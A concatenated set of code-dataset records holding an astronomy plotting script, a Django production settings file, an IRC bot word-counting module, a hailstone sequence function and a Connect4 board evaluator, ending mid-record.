ax5.add_artist(oby)\n\n ## Write brightness on the figure\n brightness_xslice = xsl_sub.get_brightness(xlim_sl, npix=np.ceil(npix_disk))\n # brightness_yslice = ysl_sub.get_brightness(ylim_sl, npix=np.ceil(npix_disk))\n fig = plt.gcf()\n ax_list = fig.axes\n xlim_xsl = ax_list[-2].get_xlim()\n ylim_xsl = ax_list[-2].get_ylim()\n # ax_list[-2].text(xlim_xsl[0]+3, (ylim_xsl[0]+ylim_xsl[1])/2, \"{:.2f}\".format(br) +'±' + \"{:.2f}\".format(br_err) + ' R' )\n ax_list[-2].text(xlim_xsl[0] + 3, (ylim_xsl[0] + ylim_xsl[1]) / 4,\n \"{:.2f}\".format(brightness_xslice[0]) + '±' + \"{:.2f}\".format(brightness_xslice[1]) + ' R')\n xlim_ysl = ax_list[-1].get_xlim()\n ylim_ysl = ax_list[-1].get_ylim()\n # ax_list[-1].text(xlim_ysl[0]+5, (ylim_ysl[0]+ylim_ysl[1])/2, \"{:.2f}\".format(br) +'±' + \"{:.2f}\".format(br_err) + ' R')\n # ax_list[-1].text(xlim_ysl[0]+5, (ylim_ysl[0]+ylim_ysl[1])/4, \"{:.2f}\".format(brightness_yslice[0]) +'±' + \"{:.2f}\".format(brightness_yslice[1]) + ' R')\n\n if with_sky:\n if mlt_date:\n if adjust_bg:\n savepath = rc.saveloc + target_body + '/plot/brightness/with_sky/mlt_date/adjust_bg/period_' + period_str + '/' + dickey + '/'\n os.makedirs(savepath, exist_ok=True)\n filename = target_body + '_period_' + period_str + '_' + linename + '.png'\n else:\n savepath = rc.saveloc + target_body + '/plot/brightness/with_sky/mlt_date/normal/period_' + period_str + '/' + dickey + '/'\n os.makedirs(savepath, exist_ok=True)\n filename = target_body + '_period_' + period_str + '_' + linename + '.png'\n else:\n if adjust_bg:\n savepath = rc.saveloc + target_body + '/plot/brightness/with_sky/daily/adjust_bg/period_' + period_str + '/' + dickey + '/'\n os.makedirs(savepath, exist_ok=True)\n filename = target_body + '_' + date[:-2] + '_' + linename + '.png'\n else:\n savepath = rc.saveloc + target_body + '/plot/brightness/with_sky/daily/normal/period_' + period_str + '/' + dickey + '/'\n os.makedirs(savepath, exist_ok=True)\n filename = target_body + '_' + date[:-2] + '_' + linename + '.png'\n else:\n if mlt_date:\n if flip_n_roll_sky:\n savepath = rc.saveloc + target_body + '/plot/brightness/no_sky/mlt_data/flip_n_roll_sky/period_' + period_str + '/' + dickey + '/'\n else:\n savepath = rc.saveloc + target_body + '/plot/brightness/no_sky/mlt_data/normal/period_' + period_str + '/' + dickey + '/'\n os.makedirs(savepath, exist_ok=True)\n filename = target_body + '_period_' + period_str + '_' + linename + '.png'\n\n else:\n savepath = rc.saveloc + target_body + '/plot/brightness/no_sky/daily/normal/period_' + period_str + '/' + dickey + '/'\n os.makedirs(savepath, exist_ok=True)\n filename = target_body + '_' + date[:-2] + '_' + linename + '.png'\n\n if save:\n plt.savefig(savepath + filename)\n\ndef qlplot_KAI_load(target_body, obs_period, linename, date_mean=None, with_sky=False, daily=False, mlt_date=False,\n adjust_bg=False, flip_n_roll_sky=False, pdf=False):\n period_str = '{:02}'.format(obs_period)\n\n if with_sky:\n if daily:\n if adjust_bg:\n path = rc.saveloc + target_body + '/npy/brightness/with_sky/daily/adjust_bg/period_' + period_str + '/'\n else:\n path = rc.saveloc + target_body + '/npy/brightness/with_sky/daily/normal/period_' + period_str + '/'\n savename = 'brightness_' + date_mean + '.npy'\n\n elif mlt_date:\n if adjust_bg:\n path = rc.saveloc + target_body + '/npy/brightness/with_sky/mlt_date/adjust_bg/period_' + period_str + '/'\n else:\n path = rc.saveloc + target_body + '/npy/brightness/with_sky/mlt_date/normal/period_' + period_str + '/'\n savename = 'brightness_mlt_date.npy'\n else:\n if daily:\n path = rc.saveloc + target_body + '/npy/brightness/no_sky/daily/normal/period_' + period_str + '/'\n savename = 'brightness_' + date_mean + '.npy'\n elif mlt_date:\n if flip_n_roll_sky:\n path = rc.saveloc + target_body + '/npy/brightness/no_sky/mlt_date/flip_n_roll_sky/period_' + period_str + '/'\n else:\n path = rc.saveloc + target_body + '/npy/brightness/no_sky/mlt_date/normal/period_' + period_str + '/'\n savename = 'brightness_mlt_date.npy'\n\n dic = np.load(path + savename, allow_pickle=True).item()\n key = list(dic.keys())[0]\n qlplot_KAI(dic[key], linename)\n\nif __name__ == '__main__':\n obs_period = 7\n linename = 'OI1304'\n with_sky = False\n mlt_date = True\n daily = False\n adjust_bg = False\n flip_n_roll_sky = False\n half_dist = False\n qlplot_KAI_load('mars', obs_period, linename, with_sky=with_sky, daily=daily, mlt_date=mlt_date,\n adjust_bg=adjust_bg, flip_n_roll_sky=flip_n_roll_sky, pdf=False)","sub_path":"test/test_plt_img_load.py","file_name":"test_plt_img_load.py","file_ext":"py","file_size_in_byte":14365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"643521703","text":"import os\nimport json\nfrom dotenv import load_dotenv\nimport environ\nload_dotenv()\n\n\nenv = environ.Env(\n # set casting, default value\n DEBUG=(bool, False)\n)\n\n# A list of all the people who get code error notifications. When DEBUG=False and AdminEmailHandler is configured in LOGGING (done by default), Django emails these people the details of exceptions raised in the request/response cycle.\n# ADMINS = [('Admin', 'quantum@admin.com'), ('Mary', 'mary@example.com')]\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nenviron.Env.read_env(os.path.join(BASE_DIR, '.env'))\n\nENVIRONMENT = 'production'\n\nSECRET_KEY = os.environ.get('DJANGO_SECRET_KEY')\n\n\nDEBUG = False\n# from django.contrib.messages import constants as message_constants\n# MESSAGE_LEVEL = message_constants.DEBUG\n\nALLOWED_HOSTS = ['*']\n# ALLOWED_HOSTS = ['https://quantum-coasters.uc.r.appspot.com', 'https://api-dot-quantum-coasters.uc.r.appspot.com']\n\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'corsheaders',\n 'rest_framework',\n 'rest_framework.authtoken',\n 'rest_auth',\n 'rest_framework_jwt',\n 'rest_framework_jwt.blacklist',\n 'django.contrib.sites',\n 'rest_auth.registration',\n 'allauth',\n 'allauth.account',\n 'allauth.socialaccount',\n # Included providers for allauth\n # 'allauth.socialaccount.providers.auth0',\n 'social_django',\n 'django_filters',\n 'django.contrib.sessions.middleware',\n 'channels',\n 'quantumapi',\n 'quantumforum',\n 'quantumadminapp.apps.QuantumadminappConfig',\n # 'webpack_loader',\n]\n\n# Config/ routing for Websockets/ chat\nASGI_APPLICATION = \"quantumapp.asgi.application\"\n\nCHANNEL_LAYERS = {\n \"default\": {\n \"BACKEND\": \"channels_redis.core.RedisChannelLayer\",\n \"CONFIG\": {\n \"hosts\": [(\"127.0.0.1\", 6379)],\n },\n },\n}\n\n# WEBPACK_LOADER = {\n# 'DEFAULT': {\n# 'BUNDLE_DIR_NAME': '',\n# 'STATS_FILE': os.path.join(BASE_DIR, 'webpack-stats.json')\n# }\n# }\n\nMIDDLEWARE = [\n 'corsheaders.middleware.CorsMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.RemoteUserMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'social_django.middleware.SocialAuthExceptionMiddleware',\n 'django.contrib.sites.middleware.CurrentSiteMiddleware',\n]\n\n\nREST_FRAMEWORK = {\n 'DEFAULT_FILTER_BACKENDS': ['django_filters.rest_framework.DjangoFilterBackend'],\n 'DEFAULT_PERMISSION_CLASSES': [\n 'rest_framework.permissions.IsAuthenticated',\n ],\n # These are set globally, as the global authentication schemes. Can also set on a per view basis.\n # Using authentication_classes = [JSONWebTokenAuthentication]..etc...\n 'DEFAULT_AUTHENTICATION_CLASSES': (\n 'rest_framework.authentication.SessionAuthentication',\n 'rest_framework.authentication.TokenAuthentication',\n 'rest_framework.authentication.BasicAuthentication',\n 'rest_framework.authentication.RemoteUserAuthentication',\n 'rest_framework_jwt.authentication.JSONWebTokenAuthentication',\n # 'rest_framework_simplejwt.authentication.JWTAuthentication',\n ),\n}\n\n# env variables sent through context to templates, redirect to Client React App URLS\nREACT_APP_FORUM_URL = os.environ.get('REACT_APP_FORUM_URL')\nREACT_APP_HOME = os.environ.get('REACT_APP_HOME')\nREACT_APP_USER_PROFILE = os.environ.get('REACT_APP_USER_PROFILE')\nCLIENT_URL = 'https://quantum-coasters.uc.r.appspot.com'\n\n# For if deployed to App Engine\nFORUM_URL = \"https://api-dot-quantum-coasters.uc.r.appspot.com/index\"\nADMIN_URL = \"https://api-dot-quantum-coasters.uc.r.appspot.com/quantumadmin/\"\n\n\n# Quantum API - Auth0 Credentials (Management API APP(Test Application))\nAUTH0_CLIENT_ID = os.environ.get('AUTH0_CLIENT_ID')\nAUTH0_DOMAIN = os.environ.get('AUTH0_DOMAIN')\nAUTH0_CLIENT_SECRET = os.environ.get('AUTH0_CLIENT_SECRET')\n\n# Quantum API\nAPI_IDENTIFIER = os.environ.get('API_IDENTIFIER')\nQUANTUM_COASTERS_API_ID = os.environ.get('QUANTUM_COASTERS_API_ID')\n\n\n# Management API\n# SCOPES = ['openid', 'profile', 'offline_access', 'name', 'given_name', 'family_name', 'nickname', 'email', 'email_verified', 'picture', 'created_at', 'identities', 'phone', 'address']\n# AUTH0_OPEN_ID_USERS_SERVER_URL = os.environ.get('AUTH0_OPEN_ID_USERS_SERVER_URL')\nAUTH0_OPEN_ID_SERVER_URL = os.environ.get('AUTH0_OPEN_ID_SERVER_URL')\nAUTH0_MANAGEMENT_API_ID = os.environ.get('AUTH0_MANAGEMENT_API_ID')\nMANAGEMENT_API_PAYLOAD = json.dumps({\n \"client_id\": os.environ.get('AUTH0_CLIENT_ID'),\n \"client_secret\": os.environ.get('AUTH0_CLIENT_SECRET'),\n \"audience\": os.environ.get('AUTH0_OPEN_ID_SERVER_URL'),\n \"grant_type\": \"client_credentials\"\n })\nMANAGEMENT_API_AUTHORIZATION_CODE = json.dumps({\n \"client_id\": os.environ.get('AUTH0_CLIENT_ID'),\n \"client_secret\": os.environ.get('AUTH0_CLIENT_SECRET'),\n \"audience\": os.environ.get('AUTH0_OPEN_ID_SERVER_URL'),\n \"grant_type\": \"authorization_code\"\n })\n\n\n# Auth0 Credentials for Quantum Application\nSOCIAL_AUTH_TRAILING_SLASH = False # Remove trailing slash from routes\nSOCIAL_AUTH_AUTH0_DOMAIN = os.environ.get('SOCIAL_AUTH_AUTH0_DOMAIN')\n\n# Quantum Coasters Key\nSOCIAL_AUTH_AUTH0_KEY = os.environ.get('SOCIAL_AUTH_AUTH0_KEY')\n\n# Quantum Coasters Secret\nSOCIAL_AUTH_AUTH0_SECRET = os.environ.get('SOCIAL_AUTH_AUTH0_SECRET')\nSOCIAL_AUTH_AUTH0_SCOPE = [\n 'openid',\n 'profile',\n 'email',\n]\n\n\n# For Testing, to persist session cookies between redirect when redirecting user from login page.\n# Set to false for dev on localhost\nSESSION_COOKIE_SECURE = True\nCSRF_COOKIE_SECURE = False\n# If this is set to True, the cookie will be marked as “secure”, which means browsers may ensure that the cookie is only sent with an HTTPS connection\n# CSRF_COOKIE_HTTPONLY = False\n\n# https://docs.djangoproject.com/en/3.2/ref/settings/#session-cookie-domain\nSESSION_COOKIE_DOMAIN = \"appspot.com\"\n# Whether to store the CSRF token in the user’s session instead of in a cookie. It requires the use of django.contrib.sessions\nCSRF_USE_SESSIONS = False\nSESSION_SAVE_EVERY_REQUEST = True\nSESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'\nSESSION_COOKIE_SECURE = True\n\n# # Use with Ngnix configuration\n# SOCIAL_AUTH_REDIRECT_IS_HTTPS = True\n\n# https://docs.djangoproject.com/en/3.2/ref/contrib/sites/#module-django.contrib.sites\nSITE_ID = 1\n\n\nAUTH_USER_MODEL = 'quantumapi.User'\n\nJWT_AUTH = {\n 'JWT_PAYLOAD_GET_USERNAME_HANDLER':\n 'quantumapi.utils.jwt_get_username_from_payload_handler',\n 'JWT_DECODE_HANDLER':\n 'quantumapi.utils.jwt_decode_token',\n 'JWT_ALGORITHM': 'RS256',\n 'JWT_AUDIENCE': API_IDENTIFIER,\n 'JWT_ISSUER': os.environ.get('JWT_ISSUER'),\n 'JWT_AUTH_HEADER_PREFIX': 'Bearer',\n}\n\n\nAUTHENTICATION_BACKENDS = (\n 'social_core.backends.open_id.OpenIdAuth',\n 'quantumapi.auth0_backend.Auth0',\n 'django.contrib.auth.backends.RemoteUserBackend',\n 'quantumapi.auth0_backend.QuantumAdminOpenID',\n # Take into account that backends must be defined in AUTHENTICATION_BACKENDS or Django won’t pick them when trying to authenticate the user.\n 'social_core.backends.google_openidconnect.GoogleOpenIdConnect',\n 'social_core.backends.google.GoogleOAuth2',\n 'social_core.backends.google.GoogleOAuth',\n # 'social_core.backends.open_id_connect.OpenIdConnectAuth'\n\n # `allauth` specific authentication methods, such as login by e-mail\n # 'allauth.account.auth_backends.AuthenticationBackend',\n 'django.contrib.auth.backends.ModelBackend',\n)\n\nROOT_URLCONF = 'quantumapp.urls'\n\n# from corsheaders.defaults import default_headers\n# CORS_ALLOW_HEADERS = default_headers + (\n# 'Access-Control-Allow-Origin',\n# )\n\n# CORS_ORIGIN_WHITELIST = (\n# 'https://quantum-coasters.uc.r.appspot.com',\n# 'https://api-dot-quantum-coasters.uc.r.appspot.com',\n# 'https://quantum-coasters.uc.r.appspot.com/',\n# 'https://api-dot-quantum-coasters.uc.r.appspot.com/',\n# )\n\nCORS_ALLOWED_ORIGINS = [\n 'http://127.0.0.1:3000',\n 'http://localhost:3000',\n 'http://localhost:8000',\n 'http://127.0.0.1:8000',\n 'https://quantum-coasters.uc.r.appspot.com',\n 'https://api-dot-quantum-coasters.uc.r.appspot.com',\n]\n\n# To allow some domains to make \"POST\" requests\nCSRF_TRUSTED_ORIGINS = [\n 'https://quantum-coasters.uc.r.appspot.com',\n]\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n # 'DIRS': [[os.path.join(BASE_DIR, \"quantumadminapp\")],],\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n 'social_django.context_processors.backends',\n 'social_django.context_processors.login_redirect',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'quantumapp.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/3.0/ref/settings/#databases\n# Use django-environ to parse the connection string\n# DATABASES = {\"default\": env.db()}\n# print(env.db())\n# DATABASE_URL = os.environ.get('DATABASE_URL')\n# DATABASES = {\n# 'default' : {\n# 'ENGINE': 'django.db.backends.postgresql',\n# 'NAME': os.environ.get('CLOUD_SQL_DATABASE_NAME'),\n# 'USER': os.environ.get('CLOUD_SQL_USERNAME'),\n# 'PASSWORD': os.environ.get('CLOUD_SQL_PASSWORD'),\n# 'HOST': os.environ.get('CLOUD_SQL_HOST'),\n# # 'PORT': 5432,\n# }\n# }\n\nDATABASE_URL=os.environ.get('DATABASE_URL')\nDATABASES = {\"default\": env.db()}\n\n# If the flag as been set, configure to use proxy\nif os.getenv(\"USE_CLOUD_SQL_AUTH_PROXY\", None):\n DATABASES[\"default\"][\"HOST\"] = \"127.0.0.1\"\n DATABASES[\"default\"][\"PORT\"] = 5432\n\n\n# if os.environ.get(\"USE_CLOUD_SQL_AUTH_PROXY\") and ENVIRONMENT == 'local':\n# DATABASE_URL=os.environ.get('DATABASE_URL')\n# DATABASES = {\n# 'default' : {\n# 'ENGINE': 'django.db.backends.postgresql',\n# 'NAME': os.environ.get('CLOUD_SQL_DATABASE_NAME'),\n# # 'NAME': os.environ.get('CLOUD_SQL_CONNECTION_NAME'),\n# 'USER': os.environ.get('CLOUD_SQL_USERNAME'),\n# 'PASSWORD': os.environ.get('CLOUD_SQL_PASSWORD'),\n# 'HOST': \"127.0.0.1\",\n# 'PORT': 5432,\n# }\n# }\n# else:\n# DATABASE_URL=os.environ.get('DATABASE_URL')\n# DATABASES = {\n# 'default' : {\n# 'ENGINE': 'django.db.backends.postgresql',\n# 'NAME': os.environ.get('CLOUD_SQL_DATABASE_NAME'),\n# 'USER': os.environ.get('CLOUD_SQL_USERNAME'),\n# 'PASSWORD': os.environ.get('CLOUD_SQL_PASSWORD'),\n# 'HOST': os.environ.get('CLOUD_SQL_HOST'),\n# # 'PORT': 5432,\n# }\n# }\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/3.0/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/3.0/howto/static-files/\n\nMEDIA_URL = '/media/'\nMEDIA_ROOT = os.path.join(BASE_DIR, \"media/\")\n\nSTATIC_URL = '/static/'\n# STATICFILES_DIRS = [\n# os.path.join(BASE_DIR, \"quantumforum/static\"),\n# os.path.join(BASE_DIR, \"quantumadmin/static\"),\n# ]\nSTATIC_ROOT = os.path.join(BASE_DIR, \"static\")\n\n\n# For Quantum Coasters React app\nLOGIN_URL = os.environ.get('LOGIN_URL')\nLOGIN_REDIRECT_URL = os.environ.get('LOGIN_REDIRECT_URL')\nLOGOUT_URL = os.environ.get('LOGOUT_URL')\nLOGOUT_REDIRECT_URL = os.environ.get('LOGOUT_REDIRECT_URL')\n\n# QuantumAdminApp\nQUANTUMADMIN_REGISTER_URL = os.environ.get('QUANTUMADMIN_REGISTER_URL')\n\n# Social Auth Configs (For Django full stack app)\n# https://readthedocs.org/projects/python-social-auth/downloads/pdf/latest/\n# https://python-social-auth.readthedocs.io/en/latest/configuration/django.html\n\n# The OpenID backend will check for a username key in the values returned by the server, but default to first-name\n# + last-name if that key is missing. It’s possible to indicate the username key in the values If the username is under\n# a different key with a setting, but backends should have defined a default value.\n# SOCIAL_AUTH_FEDORA_USERNAME_KEY = 'email'\n\n# authorize endpoint in Auth0 backend to authorize user.\nSOCIAL_AUTH_LOGIN_URL = os.environ.get('SOCIAL_AUTH_LOGIN_URL')\n\n\n\nSOCIAL_AUTH_LOGIN_REDIRECT_URL = os.environ.get('SOCIAL_AUTH_LOGIN_REDIRECT_URL')\nSOCIAL_AUTH_NEW_ASSOCIATION_REDIRECT_URL = os.environ.get('SOCIAL_AUTH_NEW_ASSOCIATION_REDIRECT_URL')\n\nSOCIAL_AUTH_URL_NAMESPACE = 'social'\nSOCIAL_AUTH_ADMIN_USER_SEARCH_FIELDS = [\n 'username', 'first_name', 'last_name', 'email'\n]\n\nSOCIAL_AUTH_USER_MODEL = 'quantumapi.User'\nSOCIAL_AUTH_USERNAME_IS_FULL_EMAIL = True\nSOCIAL_AUTH_CLEAN_USERNAMES = True\n# SOCIAL_AUTH_PROTECTED_USER_FIELDS = os.environ.get('SOCIAL_AUTH_PROTECTED_USER_FIELDS')\n# SOCIAL_AUTH_AUTH0_WHITELISTED_DOMAINS = os.environ.get('SOCIAL_AUTH_AUTH0_WHITELISTED_DOMAINS')\n# SOCIAL_AUTH_AUTH0_WHITELISTED_DOMAINS = os.environ.get('SOCIAL_AUTH_AUTH0_WHITELISTED_DOMAINS')\n\n# SOCIAL_AUTH_POSTGRES_JSONFIELD = True\nSOCIAL_AUTH_JSONFIELD_ENABLED = True\nSOCIAL_AUTH_STRATEGY = 'social_django.strategy.DjangoStrategy'\nSOCIAL_AUTH_STORAGE = 'social_django.models.DjangoStorage'\n\nSOCIAL_AUTH_PIPELINE = (\n 'social_core.pipeline.social_auth.social_details',\n 'social_core.pipeline.social_auth.social_uid',\n 'social_core.pipeline.social_auth.auth_allowed',\n 'social_core.pipeline.social_auth.social_user',\n 'social_core.pipeline.user.get_username',\n 'social_core.pipeline.mail.mail_validation',\n 'social_core.pipeline.social_auth.associate_by_email',\n 'social_core.pipeline.user.create_user',\n 'social_core.pipeline.social_auth.associate_user',\n 'social_core.pipeline.social_auth.load_extra_data',\n 'social_core.pipeline.user.user_details',\n 'social_core.pipeline.debug.debug',\n)\n\n# Django All-Auth Settings (SocialAccount)\n# https://django-allauth.readthedocs.io/en/latest/configuration.html\n\nSOCIALACCOUNT_PROVIDERS = {\n 'auth0': {\n 'AUTH0_URL': os.environ.get('SOCIALACCOUNT_DOMAIN'),\n \"VERIFIED_EMAIL\": True\n }\n}\n\nACCOUNT_USER_MODEL_USERNAME_FIELD = 'email'\nACCOUNT_EMAIL_REQUIRED = True\nACCOUNT_UNIQUE_EMAIL = True\nACCOUNT_USERNAME_REQUIRED = True\nSOCIALACCOUNT_STORE_TOKENS = True\n\n# Email verification\n# https://django-allauth.readthedocs.io/en/latest/views.html#e-mail-verification\n# https://django-allauth.readthedocs.io/en/latest/views.html#e-mails-management-account-email\nACCOUNT_AUTHENTICATION_METHOD = 'email'\nACCOUNT_EMAIL_VERIFICATION = 'optional'\nSOCIALACCOUNT_EMAIL_VERIFICATION = ACCOUNT_EMAIL_VERIFICATION\nACCOUNT_CONFIRM_EMAIL_ON_GET = True\nACCOUNT_EMAIL_CONFIRMATION_ANONYMOUS_REDIRECT_URL = '/?verification=1'\nACCOUNT_EMAIL_CONFIRMATION_AUTHENTICATED_REDIRECT_URL = '/?verification=1'\n# ACCOUNT_CONFIRM_EMAIL_ON_GET = False\n# ACCOUNT_EMAIL_CONFIRMATION_ANONYMOUS_REDIRECT_URL = 'None'\n# ACCOUNT_EMAIL_CONFIRMATION_AUTHENTICATED_REDIRECT_URL = 'None'\n\n# Used to override forms, for example: {'signup': 'myapp.forms.SignupForm'}\n# SOCIALACCOUNT_FORMS = {}\n\nEMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\nREST_AUTH_SERIALIZERS = {\n 'USER_DETAILS_SERIALIZER': 'quantumapi.views.UserSerializer'\n}\nREST_SESSION_LOGIN = True\n\n# Django only sends a cookie if it needs to. If you don’t set any session data, it won’t send a session cookie, unless this is set to true.\nSESSION_SAVE_EVERY_REQUEST = True\n\n# When doing dumpdata, specifies fixture dir to put fixture in. *Comment out when running loaddata or will throw error bc it duplicates.\nFIXTURE_DIRS = '/Users/matthewcrook/code/nss/frontEnd/quantumapp/quantumapi/fixtures'\n\n# Setting Django's primary key type creation (this will exempt migrations)\nDEFAULT_AUTO_FIELD = 'django.db.models.AutoField'\n\n# Same but is a 64-bit integer, much like an AutoField except that it is guaranteed to fit numbers from 1 to 9223372036854775807.\n# DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'\n\n# CORS_ORIGIN_ALLOW_ALL = True\n# CORS_ALLOW_CREDENTIALS = True\n","sub_path":"quantumapp/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":17157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"151864267","text":"from twisted.plugin import IPlugin\nfrom heufybot.channel import IRCChannel\nfrom heufybot.moduleinterface import IBotModule\nfrom heufybot.modules.commandinterface import BotCommand\nfrom heufybot.utils import networkName\nfrom zope.interface import implements\nimport operator\n\n\nclass WordCounterCommand(BotCommand):\n implements(IPlugin, IBotModule)\n\n name = \"WordCounter\"\n commandUsed = False\n\n def triggers(self):\n return [\"addwordcount\", \"remwordcount\", \"wordcount\"]\n\n def actions(self):\n return super(WordCounterCommand, self).actions() + [\n (\"message-channel\", 1, self.countMessage),\n (\"ctcp-message\", 1, self.countAction) ]\n\n def load(self):\n self.help = \"Commands: addwordcount , remwordcount , wordcount | Add or remove a word that\" \\\n \" should be counted in the channel or request how many times a given word has been said.\"\n self.commandHelp = {\n \"addwordcount\": \"addwordcount | Add a word to be counted.\",\n \"remwordcount\": \"remwordcount | Remove a word that is being counted.\",\n \"wordcount\": \"wordcount | Request how many times a given word has been said.\"\n }\n if \"wordcounts\" not in self.bot.storage:\n self.bot.storage[\"wordcounts\"] = {}\n self.wordCounters = self.bot.storage[\"wordcounts\"]\n\n def checkPermissions(self, server, source, user, command):\n if command == \"addwordcount\" or command == \"remwordcount\":\n return not self.bot.moduleHandler.runActionUntilFalse(\"checkadminpermission\", server, source, user,\n \"word-counter\")\n else:\n return True\n\n def execute(self, server, source, command, params, data):\n self.commandUsed = True\n if \"channel\" not in data:\n self.replyPRIVMSG(server, source, \"Word counters can only be used in channels.\")\n return\n if len(params) < 1:\n self.replyPRIVMSG(server, source, \"You didn't specify a word.\")\n return\n network = networkName(self.bot, server)\n if network not in self.wordCounters:\n self.wordCounters[network] = {}\n if source not in self.wordCounters[network]:\n self.wordCounters[network][source] = {}\n word = params[0].lower()\n if command == \"addwordcount\":\n if word in self.wordCounters[network][source]:\n self.replyPRIVMSG(server, source, \"A counter for {!r} already exists.\".format(word))\n else:\n self.wordCounters[network][source][word] = {}\n self.bot.storage[\"wordcounts\"] = self.wordCounters\n self.replyPRIVMSG(server, source, \"A counter for {!r} has been added.\".format(word))\n elif command == \"remwordcount\":\n if word in self.wordCounters[network][source]:\n del self.wordCounters[network][source][word]\n self.bot.storage[\"wordcounts\"] = self.wordCounters\n self.replyPRIVMSG(server, source, \"The counter for {!r} has been removed.\".format(word))\n\n else:\n self.replyPRIVMSG(server, source, \"A counter for {!r} does not exist.\".format(word))\n elif command == \"wordcount\":\n self.commandUsed = True\n if word not in self.wordCounters[network][source]:\n self.replyPRIVMSG(server, source, \"A counter for {!r} does not exist.\".format(word))\n return\n total = sum(self.wordCounters[network][source][word].itervalues())\n result = \"The word {!r} has been said {} times.\".format(word, total)\n if result > 0:\n top = max(self.wordCounters[network][source][word].iteritems(), key=operator.itemgetter(1))\n result = \"{} The top contributor is {} with {} times.\".format(result, top[0], top[1])\n self.replyPRIVMSG(server, source, result)\n\n def countMessage(self, server, channel, user, body):\n self._countWords(networkName(self.bot, server), channel.name, user.nick, body)\n\n def countAction(self, server, source, user, body):\n if body.upper().startswith(\"ACTION\") and isinstance(source, IRCChannel):\n self._countWords(networkName(self.bot, server), source.name, user.nick, body)\n\n def _countWords(self, server, source, user, body):\n if self.commandUsed:\n self.commandUsed = False\n return\n if server not in self.wordCounters:\n return\n if source not in self.wordCounters[server]:\n return\n for word, users in self.wordCounters[server][source].iteritems():\n if word in body:\n if user in users:\n self.wordCounters[server][source][word][user] += 1\n else:\n self.wordCounters[server][source][word][user] = 1\n self.bot.storage[\"wordcounts\"] = self.wordCounters\n\n\nwordCounter = WordCounterCommand()\n","sub_path":"heufybot/modules/commands/wordcounter.py","file_name":"wordcounter.py","file_ext":"py","file_size_in_byte":5052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"566202905","text":"#Hail Stone program\n\ndef hail(first):\n \"\"\"\n This function which returns a list whose items are the\n hailstone sequence whose first term is (first)\n \"\"\"\n hail = []\n while first != 1:\n hail.append(first)\n if first%2 == 0:\n next_term = first/2\n first = next_term\n else: \n next_term = first*3+1\n first = next_term\n return hail\ns = hail(5)\nprint(s)","sub_path":"hailstone.py","file_name":"hailstone.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"589721376","text":"from connect4 import Connect4\nfrom bits import sparse_bit_count\n\nSIDE_TO_MOVE = 10\nFACTOR_3 = 18\n\nLOSS_SCORE = -10000\n \ndef shifts4(state, mask, direction):\n\tmask &= mask << (2 * direction)\n\tmask &= mask << direction\n\treturn mask\n \ndef strech4(state, mask, direction):\n\tmask |= mask >> (2 * direction)\n\tmask |= mask >> direction\n\treturn mask\n\ndef evaluate(state):\n\tscore = SIDE_TO_MOVE\n\tscore += direction(state, state._up)\n\tscore += direction(state, state._right)\n\tscore += direction(state, state._right_up)\n\tscore += direction(state, state._right_down)\n\treturn score\n\ndef direction(state, i):\n\tcurrent_player = state.current_player()\n\topponent = state.opponent()\n\town_tokens = state._player_tokens[current_player]\n\topponent_tokens = state._player_tokens[opponent]\n\t\n\tscore = 0\n\twin_positions = shifts4(state, state._full_board & ~opponent_tokens, i)\n\twin_fields = strech4(state, win_positions, i)\n\ttokens = own_tokens\n\ttokens &= tokens << i\n\tscore += sparse_bit_count(win_fields & tokens)\n\ttokens &= tokens << i\n\tscore += FACTOR_3 * sparse_bit_count(win_fields & tokens)\n \n\twin_positions = shifts4(state, state._full_board & ~own_tokens, i)\n\twin_fields = strech4(state, win_positions, i)\n\ttokens = opponent_tokens\n\ttokens &= tokens << i\n\tscore -= sparse_bit_count(win_fields & tokens)\n\ttokens &= tokens << i\n\tscore -= FACTOR_3 * sparse_bit_count(win_fields & tokens)\n\treturn score\n","sub_path":"python/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"518247983","text":"import 